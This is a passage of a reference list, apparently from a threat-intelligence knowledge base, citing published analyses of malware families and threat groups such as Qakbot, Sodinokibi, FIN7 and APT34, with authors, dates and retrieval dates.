  82. Adair, S.. (2016, November 9). PowerDuke: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs. Retrieved January 11, 2017.
  83. Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.
  84. Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.
  85. Elovitz, S. & Ahl, I. (2016, August 18). Know Your Enemy: New Financially-Motivated & Spear-Phishing Group. Retrieved February 26, 2018.
  86. Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.
  87. Nicolas Verdier. (n.d.). Retrieved January 29, 2018.
  88. Mendoza, E. et al. (2020, May 25). Qakbot Resurges, Spreads through VBS Files. Retrieved September 27, 2021.
  89. CS. (2020, October 7). Duck Hunting with Falcon Complete: A Fowl Banking Trojan Evolves, Part 2. Retrieved September 27, 2021.
  90. Trend Micro. (2020, December 17). QAKBOT: A decade-old malware still with new tricks. Retrieved September 27, 2021.
  91. Cyberint. (2021, May 25). Qakbot Banking Trojan. Retrieved September 27, 2021.
  92. Kuzmenko, A. et al. (2021, September 2). QakBot technical analysis. Retrieved September 27, 2021.
  93. Group IB. (2020, September). LOCK LIKE A PRO. Retrieved September 27, 2021.
  94. MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.
  95. Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.
  96. Aquino, M. (2013, June 13). RARSTONE Found In Targeted Attacks. Retrieved December 17, 2015.
  97. Lei, C., et al. (2018, January 24). Lazarus Campaign Targeting Cryptocurrencies Reveals Remote Controller Tool, an Evolved RATANKBA, and More. Retrieved May 22, 2018.
  98. Trend Micro. (2017, February 27). RATANKBA: Delving into Large-scale Watering Holes against Enterprises. Retrieved May 22, 2018.
  99. Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.
  100. PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.
  101. Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.
  102. Symantec Security Response. (2016, September 6). Buckeye cyberespionage group shifts gaze from US to Hong Kong. Retrieved September 26, 2016.
  103. Symantec Security Response. (2016, August 8). Backdoor.Remsec indicators of compromise. Retrieved August 17, 2016.
  104. Kaspersky Lab's Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Technical Analysis. Retrieved August 17, 2016.
  105. Livelli, K, et al. (2018, November 12). Operation Shaheen. Retrieved May 1, 2019.
  106. Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.
  107. McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.
  108. Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.
  109. Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.
  110. Liebenberg, D.. (2018, August 30). Rocke: The Champion of Monero Miners. Retrieved May 26, 2020.
  111. Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.
  112. Lee, B., Falcone, R. (2019, January 18). DarkHydrus delivers new Trojan that can use Google Drive for C2 communications. Retrieved April 17, 2019.
  113. Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.
  114. Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020.
  115. Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.
  116. Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020.
  117. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, July 30). Sakula Malware Family. Retrieved January 26, 2016.
  118. Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.
  119. Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020.
  120. Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020.
  121. Grunzweig, J.. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016.
  122. Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.
  123. Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.
  124. Vilkomir-Preisman, S. (2019, April 2). New ServHelper Variant Employs Excel 4.0 Macro to Drop Signed Payload. Retrieved May 28, 2019.
  125. Centero, R. et al. (2021, February 5). New in Ransomware: Seth-Locker, Babuk Locker, Maoloa, TeslaCrypt, and CobraLocker. Retrieved August 11, 2021.
  126. GReAT. (2017, August 15). ShadowPad in corporate networks. Retrieved March 22, 2021.
  127. Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.
  128. Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020.
  129. Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.
  130. Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020.
  131. Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
  132. Hegel, T. (2021, January 13). A Global Perspective of the SideWinder APT. Retrieved January 27, 2021.
  133. Cyble. (2020, September 26). SideWinder APT Targets with futuristic Tactics and Techniques. Retrieved January 29, 2021.
  134. Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020.
  135. Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020.
  136. BishopFox. (n.d.). Sliver Upload. Retrieved September 16, 2021.
  137. DHS/CISA, Cyber National Mission Force. (2020, October 1). Malware Analysis Report (MAR) MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA. Retrieved October 2, 2020.
  138. Hasherezade. (2016, September 12). Smoke Loader – downloader with a smokescreen still alive. Retrieved March 20, 2018.
  139. FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.
  140. CISA. (2021, May 6). Analysis Report (AR21-126A) FiveHands Ransomware. Retrieved June 7, 2021.
  141. CISA. (2020, July 16). MAR-10296782-1.v1 – SOREFANG. Retrieved September 29, 2020.
  142. National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.
  143. Check Point Research. (2019, February 4). SpeakUp: A New Undetected Backdoor Linux Trojan. Retrieved April 17, 2019.
  144. CTU. (2018, September 27). Cybercriminals Increasingly Trying to Ensnare the Big Financial Fish. Retrieved September 20, 2021.
  145. Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.
  146. Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.
  147. Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
  148. Salem, E. (2019, April 25). Threat Actor TA505 Targets Financial Enterprises Using LOLBins and a New Backdoor Malware. Retrieved May 28, 2019.
  149. Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.
  150. Duncan, B. (2021, January 7). TA551: Email Attack Campaign Switches from Valak to IcedID. Retrieved March 17, 2021.
  151. Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.
  152. USG. (2020, May 12). MAR-10288834-2.v1 – North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.
  153. ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.
  154. Fishbein, N. (2020, September 8). Attackers Abusing Legitimate Cloud Monitoring Tools to Conduct Cyber Attacks. Retrieved September 22, 2021.
  155. Patrick Wardle. (2020, July 3). OSX.EvilQuest Uncovered part ii: insidious capabilities. Retrieved March 21, 2021.
  156. Faou, M., Tartare, M., Dupuy, T. (2021, March 10). Exchange servers under siege from at least 10 APT groups. Retrieved May 21, 2021.
  157. Antazo, F. (2016, October 31). TSPY_TRICKLOAD.N. Retrieved September 14, 2018.
  158. Radu Tudorica. (2021, July 12). A Fresh Look at Trickbot’s Ever-Improving VNC Module. Retrieved September 28, 2021.
  159. Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.
  160. Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.
  161. Chen, J.. (2020, May 12). Tropic Trooper’s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.
  162. Tomonaga, S.. (2018, March 6). Malware “TSCookie”. Retrieved May 6, 2020.
  163. ESET Research. (2018, May 22). Turla Mosquito: A shift towards more generic tools. Retrieved July 3, 2018.
  164. O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.
  165. US-CERT. (2018, June 14). MAR-10135536-12 – North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018.
  166. Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018.
  167. Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.
  168. Trend Micro. (2014, December 11). PE_URSNIF.A2. Retrieved June 5, 2019.
  169. Sioting, S. (2013, June 15). BKDR_URSNIF.SM. Retrieved June 5, 2019.
  170. Duncan, B. (2020, July 24). Evolution of Valak, from Its Beginnings to Mass Distribution. Retrieved August 31, 2020.
  171. Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE . Retrieved June 19, 2020.
  172. Zhou, R. (2012, May 15). Backdoor.Vasport. Retrieved February 22, 2018.
  173. GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.
  174. Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.
  175. US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA – North Korean Trojan: Volgmer. Retrieved December 7, 2017.
  176. US-CERT. (2017, November 01). Malware Analysis Report (MAR) - 10135536-D. Retrieved July 16, 2018.
  177. Yagi, J. (2014, August 24). Trojan.Volgmer. Retrieved July 16, 2018.
  178. Su, V. et al. (2019, December 11). Waterbear Returns, Uses API Hooking to Evade Security. Retrieved February 22, 2021.
  179. Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.
  180. CISA. (2020, July 16). MAR-10296782-3.v1 – WELLMAIL. Retrieved September 29, 2020.
  181. PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.
  182. CISA. (2020, July 16). MAR-10296782-2.v1 – WELLMESS. Retrieved September 24, 2020.
  183. Symantec. (2019, March 6). Whitefly: Espionage Group has Singapore in Its Sights. Retrieved May 26, 2020.
  184. Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.
  185. The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021.
  186. Chronicle Blog. (2019, May 15). Winnti: More than just Windows and Gates. Retrieved April 29, 2020.
  187. S2 Grupo. (2019, April 2). WIRTE Group attacking the Middle East. Retrieved May 24, 2019.
  188. Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018.
  189. Mac Threat Response, Mobile Research Team. (2020, August 13). The XCSSET Malware: Inserts Malicious Code Into Xcode Projects, Performs UXSS Backdoor Planting in Safari, and Leverages Two Zero-day Exploits. Retrieved October 5, 2021.
  190. Alintanahin, K. (2015). Operation Tropic Trooper: Relying on Tried-and-Tested Flaws to Infiltrate Secret Keepers. Retrieved June 14, 2019.
  191. Lee, B., Falcone, R. (2018, June 06). Sofacy Group’s Parallel Attacks. Retrieved June 18, 2018.
  192. ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.
  193. Huss, D., et al. (2017, February 2). Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX. Retrieved April 5, 2018.
  194. Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.
  195. Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.
  196. Allievi, A., et al. (2014, October 28). Threat Spotlight: Group 72, Opening the ZxShell. Retrieved September 24, 2019.
  197. Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.